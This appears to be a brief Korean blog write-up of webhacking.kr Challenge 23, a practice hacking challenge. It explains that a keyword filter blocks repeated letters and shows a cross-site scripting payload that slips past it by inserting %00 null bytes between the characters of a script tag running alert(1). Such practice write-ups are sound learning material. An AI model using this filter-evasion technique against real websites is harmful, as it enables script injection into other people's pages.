반응형
https://webhacking.kr/challenge/bonus-3/
Challenge 23
webhacking.kr
[문제]
[풀이]
<script>alert(1);</script>를 실행하면 문제가 풀린다.
확인해보면 문자가 2번 이상 연속되면 필터링 된다.
%00 URL Encode로 우회해본다.
우회 성공
<s%00c%00r%00i%00p%00t%00>a%00l%00e%00r%00t(1);</s%00c%00r%00i%00p%00t>우회해서 스크립트 문을 집어넣으면
문제가 풀린다.
반응형
